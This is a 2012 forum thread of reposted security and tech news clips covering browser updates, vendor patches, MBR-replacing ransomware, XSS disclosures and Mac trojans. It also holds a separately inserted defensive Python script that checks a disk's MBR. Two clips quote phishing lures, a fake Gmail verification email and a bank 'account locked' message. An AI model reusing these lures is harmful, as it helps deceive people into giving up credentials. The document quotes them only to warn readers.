Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 11th Apr, 2012 21:49
Chrome Dev Channel Update
Tuesday, April 10, 2012 | 15:26
Labels: Dev updates
The Dev channel has been updated to 20.0.1096.1 for Windows, Mac, Linux and Chrome Frame. This build contains following updates:

Updated V8 - 3.10.0.5
file: downloads allowed again.
Enable the Chrome To Mobile page action for users with compatible registered devices [r130312]
Fixed issues 120430, 118960, 120978, 118715

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 30
Expert Contributor 11th Apr, 2012 21:52
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe patches Reader vulnerabilities, removes bundled Flash Player
Four critical vulnerabilities were addressed and several security changes were made in Adobe Reader 10.1.3 and 9.5.1

By Lucian Constantin | IDG News Service

Adobe Systems released new versions of Adobe Reader 10.x and 9.x on Tuesday, addressing four arbitrary code execution vulnerabilities and making several security-related changes to the product, including the removal of the bundled Flash Player component from the 9.x branch.

All of the vulnerabilities fixed in the newly released Adobe Reader 10.1.3 and Adobe Reader 9.5.1 versions could be exploited by an attacker to crash the application and potentially take control of the affected system, Adobe said in its APSB12-08 security bulletin. Users are advised to install these updates as soon as possible.

The company also announced that Adobe Reader 9.5.1 no longer includes authplay.dll, a Flash Player library that was bundled with previous versions of the program to enable the rendering of Flash content embedded in PDF documents.

The presence of the authplay.dll component in Adobe Reader has caused some security issues in the past, primarily because of the inconsistent update schedules for Adobe Reader and Flash Player.

Authplay.dll contains much of the stand-alone Flash Player's code, which also means that it shares most of the latter's vulnerabilities. However, while Flash Player is patched by Adobe when needed, Adobe Reader used to follow a more strict quarterly update cycle.

Read more at :-
http://www.infoworld.com/d/security/adobe-patches-...

--
mogs CClip 31
Expert Contributor 11th Apr, 2012 21:57
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft’s Patch Tuesday has four critical fixes

Update or suffer the consequences
By Dave Neal
Wed Apr 11 2012, 14:21
SOFTWARE PATCH FACTORY Microsoft has issued six security fixes in its April Patch Tuesday release, four of which are rated critical.
The four critical patches, and two given the less severe 'important' ranking, will fix 11 vulnerabilities, the firm said.
If you are good and update your systems now, you will be fixing various remote code execution vulnerabilities in Microsoft Windows, Internet Explorer and Microsoft Office.
One of the fixes is gaining the most attention though, even from Microsoft. "We list MS12-027 as our highest priority security update to deploy this month because we are aware of very limited, targeted attacks taking advantage of [the] CVE-2012-0158 vulnerability using specially crafted Office documents as [an] exploit vector," said the firm in an apparently hastily written blog post.
"People who install the MS12-027 patch are protected against CVE-2012-0158 so we recommend applying the update right away."
This weighting was backed up by security firm Qualys, where CTO Wolfgang Kandek said that it affects an "unusually wide-range" of Microsoft products. These include Microsoft Office 2003 through 2010 on Windows, SQL Server 2000 through 2008 R2, Biztalk Server 2002, Commerce Server 2002 through 2009 R2, Visual Foxpro 8 and Visual Basic 6 Runtime.
The other critical fixes tackle problems with Internet Explorer, excluding one found at the recent Pwn2own contest, though Kandek imagines that a patch for that will follow next month.

http://www.theinquirer.net/inquirer/news/2167072/m...

--
mogs CClip 32
Expert Contributor 12th Apr, 2012 08:43
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google Users Targeted with Account Verification Scams

Credentials that protect Google accounts are highly valuable for cybercriminals because they are used to access a number of services. That’s probably why scammers have launched a new campaign that’s designed to steal usernames and passwords.


According to Sophos experts, the emails bear the subject Account Verification and look something like this:

Dear Account User,

Thanks for updating your e-mail address with us.We changed your recovery e-mail address in our files to [fakeaddress]@hotmail.com.If this is correct, you can disregard this e-mail. If the new e-mail address is not correct or you did not request this change. Follow the instruction in updating your account http://accounts.google.com

However, Failure to do so may result in account suspension permanently.

Thanks for using Gmail!.
Sincerely
Gmail!.

As usual, the threat that ends the email is designed to make the future victim comply with the request without giving it too much thought.

So once the link from the notification is clicked, the user is taken to a page that almost perfectly replicates a Google login webpage, hosted on a compromised domain.

Read more at :-
http://news.softpedia.com/news/Google-Users-Target...

--
Was this reply relevant?
+0
-0
mogs CClip 33
Expert Contributor 12th Apr, 2012 22:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Ransomware stops Windows from booting by replacing its master boot record
Ransomware asks users to pay up before letting them start Windows

By Lucian Constantin
April 12, 2012 12:17 PM ET
IDG News Service - A new ransomware variant prevents infected computers from loading Windows by replacing their master boot record (MBR) and displays a message asking users for money, according to security researchers from Trend Micro.

"Based on our analysis, this malware copies the original MBR and overwrites it with its own malicious code," said Cris Pantanilla, a threat response engineer at Trend Micro, in a blog post on Thursday. "Right after performing this routine, it automatically restarts the system for the infection to take effect."

The MBR is a piece of code that resides in the first sectors of the hard drive and starts the boot loader. The boot loader then loads the OS.

Instead of starting the Windows boot loader, the rogue MBR installed by the new ransomware displays a message that asks users to deposit a sum of money into a particular account via an online payment service called QIWI, in order to receive an unlock code for their computers.

"This code will supposedly resume operating system to load and remove the infection," Pantanilla said. "When the unlock code is used, the MBR routine is removed."

As the name implies, ransomware applications hold something belonging to the victim in ransom until they pay a sum of money. This type of malware is considered the next step in the evolution of scareware, malicious programs that scare users into paying money.

The majority of ransomware applications disable important system functionality or encrypt documents and pictures, but this is the first ransomware program that Trend Micro researchers have seen replacing the MBR to prevent the system from starting.

More at :-
http://www.computerworld.com/s/article/9226155/Ran...

--
Was this reply relevant?
+0
-0
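Added example (not part of the post or the quoted article): an integrity check for the kind of MBR replacement described in CClip 33, comparing the boot code and partition table of sector 0 against a baseline recorded while the machine was known to be clean. The sector contents are constructed filler bytes, and the layout assumed is the common one (440 bytes of boot code, partition table at offset 446, 0x55AA signature at offset 510).

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440          # bytes 0..439; the disk signature follows at 440
PART_TABLE_OFF = 446         # four 16-byte entries
ENTRY = struct.Struct("<B3sB3sII")  # status, CHS start, type, CHS end, LBA, count


def read_first_sector(path):
    """Read sector 0 from a disk image or raw device (needs admin rights on a device)."""
    with open(path, "rb") as disk:
        return disk.read(SECTOR_SIZE)


def parse_mbr(sector):
    """Extract the fields worth baselining from a 512-byte MBR."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly %d bytes" % SECTOR_SIZE)
    partitions = []
    for index in range(4):
        status, _, ptype, _, lba, count = ENTRY.unpack_from(sector, PART_TABLE_OFF + 16 * index)
        if ptype != 0:  # type 0 marks an unused slot
            partitions.append({"index": index, "active": status == 0x80,
                               "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[510:512] == b"\x55\xaa",
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def check_mbr(sector, baseline):
    """Compare the current sector with a baseline produced earlier by parse_mbr()."""
    current = parse_mbr(sector)
    findings = []
    if not current["signature_ok"]:
        findings.append("missing 0x55AA boot signature")
    if current["boot_code_sha256"] != baseline["boot_code_sha256"]:
        findings.append("boot code differs from baseline")
    if current["partitions"] != baseline["partitions"]:
        findings.append("partition table differs from baseline")
    return findings


def build_sector(boot_code, entries):
    """Assemble a constructed MBR for the demonstration below."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    for index, (status, ptype, lba, count) in enumerate(entries):
        ENTRY.pack_into(sector, PART_TABLE_OFF + 16 * index,
                        status, b"\0\0\0", ptype, b"\0\0\0", lba, count)
    sector[510:512] = b"\x55\xaa"
    return bytes(sector)


# Constructed data: filler bytes stand in for real boot code.
LAYOUT = [(0x80, 0x07, 2048, 204800)]
GOOD_SECTOR = build_sector(b"\xeb\x3c" + b"\x90" * 100, LAYOUT)
REPLACED_SECTOR = build_sector(b"\xfa" * 300, LAYOUT)   # same partitions, new code
BASELINE = parse_mbr(GOOD_SECTOR)

if __name__ == "__main__":
    print("clean   :", check_mbr(GOOD_SECTOR, BASELINE))
    print("replaced:", check_mbr(REPLACED_SECTOR, BASELINE))
```

Run from rescue media against the raw disk, the same comparison shows whether restoring the saved boot code is sufficient or whether the partition table was altered as well.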
mogs CClip 34
Expert Contributor 12th Apr, 2012 22:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Security Holes Reported in HTC, Collabera, CMC and Quick Heal Sites

Security researcher Shadab Siddiqui identified a number of cross-site scripting (XSS) vulnerabilities in websites owned by the mobile phone manufacturer HTC, TATA-owned IT solution provider CMC Limited, IT firm Collabera, and Quick Heal, an Indian company that offers security products.


The screenshots provided by the researcher clearly demonstrate the existence of the security holes that can be easily leveraged to steal user cookies, launch phishing attacks and cause other types of damage to users.

The only thing with XSS vulnerabilities is that they require a certain level of user interaction when exploited, but as we’ve seen in numerous cases, that is not an impediment for skilled cybercriminals.

HTC and Quick Heal have been notified regarding the presence of these flaws around one month ago, CMC Limited and Collabera being informed at the end of March.

According to Siddiqui, he retested the sites and found that Collabera and Quick Heal addressed the issues, which shouldn’t come as a surprise, especially since they’re both companies that are active in the IT sector.

However, as in previous situations, we must note that it’s a shame some organizations fail to work together with security researchers to fix the flaws in their systems. Most experts we’ve seen are more than happy to collaborate with a firm that has a poorly coded and unsecured website.

More at :-
http://news.softpedia.com/news/Security-Holes-Repo...

--
mogs CClip 35
Expert Contributor 12th Apr, 2012 22:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
EU to examine security of connected devices

The European Commission (EC) has begun an investigation into the security and ethics surrounding web-connected appliances.
The Commission has opened up a public consultation to collect data on the opinions and expectations that businesses, researchers and citizens hold on the growth of connected devices and web-enabled appliances.

The commission said that the information it gathers would help to shape its policies and rulings on matters of privacy and security for what it calls the 'internet of things.'
"An Internet of Things with intelligence embedded into everyday objects is the next big thing," said EC vice president for the digital agenda Neelie Kroes.
"I want to promote an Internet of Things that serves our economic and societal goals, whilst preserving security, privacy and the respect of ethical values."
The survey asks for opinions and concerns on matters ranging from personal privacy and identity protection to the role of the government in mandating information security and delivering reference architectures for systems.
The study is open to both citizens and businesses as well as advocacy groups and industry professionals.

More at :-
http://www.v3.co.uk/v3-uk/news/2167526/eu-examine-...

--
mogs CClip 36
Expert Contributor 13th Apr, 2012 09:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Developer leaks Microsoft product plans for next two years

Launch details on Office 15, Phone and IE 10
By Iain Thomson in San Francisco

Updated A Microsoft developer has taken the unusual step of publishing a partial Redmond roadmap for some of the company's most important software.

Maarten Visser, CEO of Dutch cloud developer consultancy Meetroo, posted the plans, which were issued by Redmond at the end of last year, on his Twitter stream and they include launch dates for products such as Office 15, Windows Phone and IE 10. Microsoft has confirmed the veracity of the images, but warns you shouldn't bet the bank on them.


"We often provide forward-looking information to our partners and customers under our confidentiality agreements with them. This information contains our best estimates and is, in no way, final or definitive," Microsoft told The Register in an emailed statement.

Read more at :-
http://www.theregister.co.uk/2012/04/12/microsoft_...

--
mogs CClip 37
Expert Contributor 13th Apr, 2012 09:35
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Kaspersky Lab suspends Flashback-removal tool
Macworld - Kaspersky Lab on Thursday suspended distribution of its tool to remove the Flashback malware attacking Mac computers, saying the tool itself was making unacceptable alterations to user computers. A replacement is expected soon.

The lab's Flashfake Removal Tool was suspended after Kaspersky discovered that it was erroneously removing user settings--including auto-start configurations, user configurations in browsers, and file sharing data--from infected computers. It had been in operation since Monday.

More at :-
http://www.computerworld.com/s/article/9226174/Kas...

--
mogs CClip 38
Expert Contributor 13th Apr, 2012 09:40
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle to issue 88 security patches on Tuesday
The patch batch is even larger than the last one

By Chris Kanaracus
April 12, 2012 04:02 PM ET
IDG News Service - Oracle is planning to release 88 patches on Tuesday, covering vulnerabilities affecting a wide array of its products, according to a pre-release announcement posted to its website on Thursday.

Tuesday's scheduled patch release is larger than Oracle's last quarterly critical patch update in January, when it released 78 fixes.

More at :-
http://www.computerworld.com/s/article/9226169/Ora...

--
mogs CClip 39
Expert Contributor 13th Apr, 2012 09:42
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Chrome Stable Channel Update
| 16:33
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.162 on Windows, Mac, Linux and Chrome Frame. This release fixes issues including:


Windows
Facebook page hangs after a while (Issue: 121141)
black screen on Hybrid Graphics system with GPU accelerated compositing enabled (Issue: 117371)

Mac
HTML5 audio doesn't work on some Mac computers (Issue: 109441)

Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

--
mogs CClip 40
Expert Contributor 13th Apr, 2012 10:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
New fake anti-virus shakes down frightened file-sharers

Scareware brands Windows Registry Editor a smut 'tool', punts 'safe' torrents
By John Leyden

Posted in Malware, 13th April 2012 07:27 GMT

Security researchers have discovered a strain of fake anti-virus software that tries to intimidate supposed file-sharers into paying for worthless software.


SFX Fake AV, first detected by freebie antivirus scanner firm Malwarebytes, blends the features of scareware with those more associated with ransomware Trojans. The malware stops any legitimate anti-virus package from running on compromised PCs, something common to other scareware packages. But this particular strain of malware goes further than this by stopping Process Explorer (procexp.exe) and preventing browsers from loading – tactics designed to force marks to complete the ‘input credit card details’ screen and hand over money for the scamware.

More at :-
http://www.theregister.co.uk/2012/04/13/scareware_...

--
mogs CClip 41
Expert Contributor 13th Apr, 2012 19:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Firefox click-to-play feature will stop automated plug-in exploits
Mozilla plans to give Firefox users more control over the plug-in-based content displayed in their browsers

By Lucian Constantin | IDG News Service

Mozilla developers are working on a new Firefox feature that will block the automated display of plug-in-based content like Flash videos, Java applets or PDF files, and will protect users from attacks that exploit vulnerabilities in browser plug-ins to install malware on their computers.

Known as "click to play," this feature has been present in the popular NoScript Firefox security extension for many years, as well as in other browsers like Google Chrome and Opera.

When click-to-play is enabled, the browser displays static images instead of the active content that requires plug-ins to be displayed. Users need to click on those images in order to authorize the loading of each plug-in-based element.

"A couple days ago I landed an initial implementation of 'click-to-play plugins' in desktop Firefox," Mozilla software engineer Jared Wein said in a blog post on Wednesday.

Wein's implementation is available for testing in the latest Firefox nightly build, but there's still work to be done. "I'm currently working on implementing the ability for plugin activation settings to be remembered on a per-site basis," he said.

Read more at :-
http://www.infoworld.com/d/applications/firefox-cl...

--
mogs CClip 42
Expert Contributor 13th Apr, 2012 19:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

The 'Archive Team' Rescues User Content From Doomed Sites
Jason Scott and his merry band of hacker-archivists are trying to preserve our "digital history."

By Mark Sullivan | PC World | 13 April 12
What happens when your favorite Web host decides to go out of business and ice the content from thousands of users like you? Does all of that data just disappear, never to be seen again? It can happen, easily.
Under current law, a cloud or hosting site has a pretty much unlimited right to decide whether the content that people put on its pages remains available or vanishes. And a site that chooses to delete content is under no obligation to preserve the data or even to give the data's contributors advanced notice of when the purging will occur.

A typical hosting site's relevant terms of service make clear the host's claimed freedom from liability and its implied right to act unilaterally: "Your use of the [hosting site's] service is at your sole risk. [The hosting site] is not responsible for any and all files and data residing on your account on our servers. [The hosting site] does not maintain backup copies of customers web sites or e-mail. [The hosting site] cannot guarantee that the contents of a web site will never be deleted or corrupted, or that a backup of a web site will always be available. You agree to take full and sole responsibility for any and all files and data transferred to our servers and to maintain all appropriate backups of any and all files and data stored on any [hosting site] server to which you have an account on."

The freedom of Web hosts to eradicate information bothers Jason Scott a lot, and he says it's why he formed the Archive Team, a "loose, rogue band of data preservation activists." The Archive Team looks for hosting sites that are about to go down--like Apple's MobileMe right now--and then makes a furious, coordinated effort to rescue the data before it disappears into the ether.



Read more: http://www.pcadvisor.co.uk/news/security/3350982/a...

--
mogs CClip 43
Expert Contributor 16th Apr, 2012 11:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Security-Related Phishing Schemes Most Effective, Trusteer Experts Find

Experts from security solutions firm Trusteer highlight the fact that social engineering plays a very important role in phishing attacks. They also reveal that shady notifications that purport to address security issues are the most successful.


Cybercriminals have noticed that people fear for the safety of their data and the integrity of their bank accounts. That’s precisely why their malicious messages are designed to rush the potential victim into taking a decision.

In many situations, they also make threats to ensure that the user takes them seriously.

Here’s an example of a phishing email which informs bank customers that their accounts have been locked:

We locked your account because we needed to draw your attention to the fact that you didn’t complete our security online form for the year 2012. The form expires today and we need you to finish the process right away.

Accountholders may be concerned by the fact that they might not be able to access their funds and services, so they rush to complete the process and hand over the information requested by the crooks.

In another example, the scam artists tell victims that someone has been accessing their bank account:

Read more at :-
http://news.softpedia.com/news/Security-Related-Ph...

--
mogs CClip 44
Expert Contributor 16th Apr, 2012 19:48
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google wants to hire a doodler

It could be you
By Dave Neal
Mon Apr 16 2012, 15:05
INTERNET SEARCH OUTFIT Google is looking for someone that can come up with charming wastes of time like its Doodles that it uses to celebrate special occasions.
Google Doodles are those images of short film-type clips that will occasionally, though often more frequently than not, appear on its otherwise plain home page.
You might have noticed its Easter themed one, or the one that famously celebrated Pacman's birthday, those were Doodles and Google has a museum full of them. If you do not need that explanation you are quite possibly the person that the firm is looking to hire.
"First impressions matter. Every day, hundreds of millions of online users visit the Google homepage. Yes, to search. But also, to be delighted, informed, and surprised (And maybe even to laugh a little). The Google Doodle makes this possible -- it's the change that is constant on Google.com," says the introduction to Google's job advertisement for a Doodler.
"As a Product Graphic Designer/Illustrator you have the world's best platform to showcase your stylistic skills -- as well as your sense of humor, love of all things historical and imaginative artistry. From Jules Verne to Pac-Man, you have the reins to our brand and iconic logo and can run free with your innovative ideas. Go forth and doodle!"
The role includes the rather obvious responsibility for drawing, designing and animating Doodles, as well as an ability to keep coming up with new ones, within the constraints of the Google logo.
If you are thinking of applying you are going to want some sort of formal education, design experience, a showreel portfolio and something of a good imagination.
http://www.theinquirer.net/inquirer/news/2167980/g...

--
mogs CClip 45
Expert Contributor 16th Apr, 2012 19:53
Two More Mac Trojans Discovered, But Don't Panic
Two benign Trojans target Apple's Mac OS exploiting the same Java flaw patched last week.

By Jared Newman | PC World | 16 April 12
Following the outbreak of the Flashback Mac Trojan, security researchers have spotted two more cases of Mac OS X malware. The good news is most users have little reason to worry about them.

Both cases are variants on the same Trojan, called SabPub, Kaspersky Lab Expert Costin Raiu wrote on Securelist.

The first variant is known as Backdoor.OSX.SabPub.a. Like Flashback, this new threat was likely spread through Java exploits on Websites, and allows for remote control of affected systems. It was created roughly one month ago.

Read more: http://www.pcadvisor.co.uk/news/security/3351410/t...

--
mogs CClip 46
Expert Contributor 16th Apr, 2012 20:05
Hoax Warns Users that RockMelt Browser Is a Virus
“If you get an instant message from anyone about a new browser called RockMelt- it is a virus. DO NOT OPEN IT. I don’t care who sends it. Please repost. This is spread to your friends if you open it,” reads the post that circulates on Facebook.

As Hoax Slayer highlights, RockMelt is certainly not a virus, the only “suspicious” activity it performs is that it sends out invitations to the individuals found in the user’s contact list. Also, when the app was first released, some antivirus products identified the main executable file as being a piece of malware.

“Sorry about that, all. Because we're a new *.exe anti-virus software is raising objections. We're working with Norton and others to resolve but in the mean time you need to manually override,” RockMelt representatives wrote at the time.

RockMelt is a free web browser created by Tim Howes and Eric Vishria that focuses on the use of social media services, especially Facebook and Twitter.

Because it focuses on Facebook, after it’s installed, RockMelt requests customers to log in to their accounts. Once logged in, users can send out invitations to all their friends.

This advertising method may be the one that made people catalog the application as being malicious. Mainly because the “send invites to all friends” option is enabled by default and those who aren’t careful may find that their friends are “spammed.”

More at :-
http://news.softpedia.com/news/Hoax-Warns-Users-th...

--
mogs CClip 47
Expert Contributor 17th Apr, 2012 20:40
Website vulnerabilities fall, but hackers become more skilled
Developers introduced 148 serious flaws on an average per website in 2011, according to WhiteHat Security

By Jeremy Kirk
April 16, 2012 11:06 PM ET
IDG News Service - The number of coding mistakes on websites continues to fall but companies are slow to fix issues that could be exploited by hackers working with improved attack tools, a security expert said.

The average number of serious vulnerabilities introduced to websites by developers in 2011 was 148, down from 230 in 2010 and 480 in 2009, said Jeremiah Grossman, chief technology officer for WhiteHat Security, which specializes in testing websites for security issues. Grossman spoke on the sidelines of the Open Web Application Security Project conference in Sydney on Monday.

The vulnerabilities are contained within custom website code and are not issues that can be fixed by applying patches from, for example, Microsoft or Oracle, Grossman said. According to WhiteHat Security statistics, it takes organizations an average of 100 days to fix about half of their vulnerabilities.

Read more at :-
http://www.computerworld.com/s/article/9226259/Web...

--
mogs CClip 48
Expert Contributor 17th Apr, 2012 20:47
Mozilla Enhances Plug-in Control in Firefox

Software engineer Jared Wein says the aim is to improve security, reduce memory usage, and open up the Web.

By Jeff Goldman

Mozilla is considering the addition of new functionality to the Firefox browser that will request user approval before running any content that requires a plug-in.

"When plugins.click_to_play is enabled, plugins will require an extra click to activate and start 'playing' content," Mozilla software engineer Jared Wein wrote in a recent blog post. "This is an incremental step towards securing our users, reducing memory usage, and opening up the web."

"This functionality prevents videos (including advertisements) on web sites from autoplaying, which is an annoyance to many users," The H Security reports. "It also conserves system resources as content presented through plugins often makes up a big part of the resources consumed by the browser. Another benefit of the click-to-play approach is that plugins only get loaded when the user actually clicks on the content in question. This limits the opportunities for 'drive-by' malware attacks by malicious content that targets plugin vulnerabilities in Flash and Java."

"Currently there are Firefox add-ons that do something similar, such as the NoScript extension that blocks JavaScript, Java, Flash, Silverlight and other content by default and Flashblock, which requires a user click on a static image before the plugin can load," notes Threatpost's Anne Saita. "But as of yet, no Web browser does it by default."

Still, ExtremeTech's Sebastian Anthony says this is likely to be a killing blow for browser add-ons. "With the recent shift towards HTML5, which has many multimedia features built in, Flash and Java are becoming more deprecated by the day," he writes.

http://www.esecurityplanet.com/browser-security/mo...

--
mogs CClip 49
Expert Contributor 17th Apr, 2012 20:51
Chrome Stable Channel Update
Monday, April 16, 2012 | 12:21
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.163 on Mac.


This release fixes issues with fonts (Issue: 108645).


Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 50
Expert Contributor 17th Apr, 2012 21:01

Microsoft announces the editions it plans for Windows 8

Windows 8, 8 Pro, 8 Enterprise and 8 RT
By Lee Bell
Tue Apr 17 2012, 12:02
SOFTWARE HOUSE Microsoft has announced the editions of Windows 8 that will be available when it hits the market later this year.
Windows communications manager Brandon LeBlanc didn't surprise anyone when he announced in a blog post that Windows 8 will be the product name for the next editions of Windows. He said on the Windows Team Blog, "We have worked to make [the editions] easier for customers to know what will work best for them when they purchase a new Windows 8 PC or upgrade their existing PC."
However, his post did enlighten us somewhat when it said that both PCs and tablets powered by x86 processors, both 32-bit and 64 bit, will have two editions - Windows 8 and Windows 8 Pro.
Your bog-standard Windows 8 edition will include an updated Windows Explorer, Task Manager, better multi-monitor support and the ability to switch languages on the fly, something that was only available in the Enterprise and Ultimate editions of the previous versions of Windows.
According to LeBlanc, the professional version of Windows 8 has been designed to help technology enthusiasts and business professionals "obtain a broader set of Windows 8 technologies". As you'd expect, it includes all the working parts of the Windows 8 edition plus additional features for encryption, virtualisation, PC management and domain connectivity.
Windows Media Centre will also be available as an economical "media pack" add-on to Windows 8 Pro, the blog post said.
This Windows release will see a new member of the family when Microsoft launches the operating system later this year, Windows Run Time (RT). Also known as Windows on ARM or WOA PC, the single edition will only be available pre-installed on PCs and tablets powered by ARM processors. LeBlanc said it will also help enable new thin and lightweight devices with "impressive battery life". Impressive enough to last longer than one day, perhaps? It's doubtful.
Windows RT will include touch-optimised desktop versions of Microsoft Word, Excel, Powerpoint, and Onenote, as well as a new generation of cloud-enabled, touch-enabled and web-connected applications.
There will also be an enterprise edition of Windows 8 for customers with Software Assurance agreements, including everything that Windows 8 Pro boasts plus features for IT organisations that enable PC management and deployment, advanced security, virtualisation and mobility scenarios.
LeBlanc said that Microsoft will let us know more about its next Windows operating system in the coming months, including details on pricing, limited-time programmes and the promotions that it will make available to customers.

http://www.theinquirer.net/inquirer/news/2168216/m...

--
mogs CClip 51
Expert Contributor 17th Apr, 2012 21:06
Microsoft reveals Skype for web browsers project

Looks to take on Google+ Hangouts
By Carly Page
Tue Apr 17 2012, 12:12
SOFTWARE HOUSE Microsoft has revealed that it plans to launch a browser-based Skype application, its own take on Google's Hangout service.
In what is the first major development since Microsoft acquired the VoIP and chat company last May, a job posting revealed that the company is looking to hire a software engineer for a "Skype for Browsers" position.
The listing shows that the application will be based around HTML5 and Java technologies, perfect for Microsoft's plug-in free Windows 8 web browser. This also differentiates the service from the Skype video call client now found on Facebook, which uses a plug-in rather than HTML5.

More at :-
http://www.theinquirer.net/inquirer/news/2168226/m...

--
mogs CClip 52
Expert Contributor 17th Apr, 2012 21:18
Google Sends Notifications to 20,000 Hacked Site Owners.
“Is your site doing weird redirects? We just sent a ‘your site might be hacked’ message to 20K sites,” read a tweet posted by Matt Cutts, the head of the webspam team at Google, yesterday.

So, you may be wondering what Google has to do with website security and what they mean when they say weird redirects.

Search Engine Land informs that in many cases website owners and administrators are not aware that their assets have been compromised, mainly because the sites identified by Google as being overtaken only redirect visitors who access them from the search engine.

Since owners and admins rarely go to their sites from search engines, they’re unaware of the malicious operations that take place.

Regarding the systems used by Google to scan and block potentially infected websites, the company’s support page reveals the following:

This identification is based in part on guidelines set by StopBadware.org. Google uses its own criteria, procedures, and tools to identify sites that host or distribute badware. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

More at :-
http://news.softpedia.com/news/Google-Sends-Notifi...

--
mogs CClip 53
Expert Contributor 18th Apr, 2012 21:01
Gmail outage affects up to 35 million people
By Tom Espiner , 18 April, 2012 12:13

A severe Gmail service disruption on Tuesday affected up to 10 percent of users, according to Google.

The outage, which saw up to 35 million users unable to access accounts, lasted just over an hour. The disruption began at 5.42pm BST on Tuesday, Google said on its apps status dashboard.

"We've determined that this issue affected less than 10 percent of the Google Mail users who attempted to access their accounts during the affected timeframe," Google said. "While we have resolved this issue with Google Mail, it's possible that some users may experience message delays because affected accounts weren't available to receive messages."

Google does not give official figures for numbers of Gmail users. However, ZDNet UK understands that around 350 million people use the email service.

Some users of the Ars Technica open forum complained that both work and personal email accounts had been affected.

http://www.zdnet.co.uk/blogs/security-bulletin-100...

--
mogs CClip 54
Expert Contributor 18th Apr, 2012 21:12
Google Chrome Dev 20.0.1105.0
Google seems to keep a steady flow of updates for Chrome these days. After updating the stable version of the browser, they released new builds for Android (check the new features here) and the Dev channel.

Google Chrome Dev 20.0.1105.0 focuses on fixing issues mainly on Windows. Among the problems affecting all supported platforms, there is the inability to remove individual cookies and failing to move bookmarks from a subfolder to its parent directory.

The new Dev build also brings to the table an updated JavaScript engine and fixes a crash caused by moving apps to a new app sheet (screen).

Windows specific issues fixed in this release refer to a crash in the Cloud Print connector when connecting via Remote Desktop, incorrect display of icons in the task switcher and a problem with dragging downloads to a different browser window.

http://news.softpedia.com/news/Download-Google-Chr...

Dev Channel Update
Tuesday, April 17, 2012 | 17:30
Labels: Dev updates
The Dev channel has been updated to 20.0.1105.0 for Windows, Mac, Linux and Chrome Frame. This build contains following updates:

All
Updated V8 - 3.10.2.1
Fixed issues - 121584, 122130, 122850, 123403
Fixed empty apps page crash. (Issue: 122214)

Windows
Fixed a crash in the Cloud Print connector when connecting via Remote Desktop (Issue: 122996)
Fixed incorrect program icon being shown in the task switcher. (Issue: 118368)
Fixed downloads page drag/drop. (Issue: 122946)

Known Issues
[Mac 10.6] Video isn’t displayed when entered into presentation mode (pressing cmd + shift + f) (Issue: 123911)

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 55
Expert Contributor 18th Apr, 2012 21:31
The hidden danger of Windows 8 Microsoft Accounts
Microsoft goes to great lengths to convince Windows 8 users to log on with an email address, but if your account gets hijacked you could find yourself locked out

By Woody Leonhard | InfoWorld

If you've been using the Windows 8 Consumer Preview, no doubt you've toyed with the idea of using a "Microsoft Account" log-in -- most commonly a Hotmail or Windows Live email address. But have you stopped to consider what happens if your Hotmail account gets hijacked?

I'm not concerned about computers connected to the domain. I'm worried about the mobile folks, the ones who work off the grid. They face an interesting challenge in Windows 8.

Windows 8 stacks the deck, trying to convince people to log on with an email address. Microsoft has rebranded many old accounts -- Windows Live ID, Hotmail ID, Zune, and Xbox Live IDs -- into a shiny new "Microsoft Account." When you sign in to Windows 8 with your Microsoft Account, you can download apps from the Windows Store and get into your SkyDrive data with just a click. Microsoft also synchronizes many of your settings -- including legacy desktop and Metro appearances and other settings -- IE favorites and history, Web sign-ins, and so on.

If you log on to Windows 8 with a regular "Local" user ID and password, you're a second-class citizen. The Music app sniffs, "To get the most from this app, switch from your local account to a Microsoft account." You have to sign in to the Microsoft Store. SkyDrive asks for a sign-in. Photos, too. So it's definitely to your advantage to set up a Microsoft Account and use your Hotmail or Live email address. (You can use any email address as a Microsoft Account, in fact, but the Windows 8 directions don't mention that option.)

Here's the problem.

